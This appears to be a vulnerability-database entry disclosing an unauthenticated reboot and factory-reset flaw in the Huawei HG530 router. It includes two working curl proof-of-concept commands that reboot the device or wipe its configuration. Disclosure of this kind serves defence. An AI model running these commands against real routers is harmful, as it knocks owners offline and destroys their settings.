Huawei HG530 Reboot / Restore Authentication Bypass - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1671343 漏洞类型
发布时间 2019-07-19 更新时间 2019-07-19
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019070092
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Huawei HG530 Multiple Unauthenticated reboot and restore Vulnerability

===========================

The Huawei HG530 suffers from multiple Unauthenticated reboot and restore
vulnerability allows local attackers to reboot the device or to restore to
factory Configuration without user interaction.

==================

The vulnerability is located in form POST data parameter in
'Restart_factory' via path '/Forms/bottom_restart_1'

====================

Security issue PoC :

1-Rebooting :

curl -vv -X POST --path-as-is http://192.168.1.1/Forms/bottom_restart_1 -d '
defaltRomFlag=0&defaultIpFactory=192.168.1.1&Restart_factory=0'

2-Restoring :

curl -vv -X POST --path-as-is http://192.168.1.1/Forms/bottom_restart_1 -d '
defaltRomFlag=0&defaultIpFactory=192.168.1.1&Restart_factory=1'

========================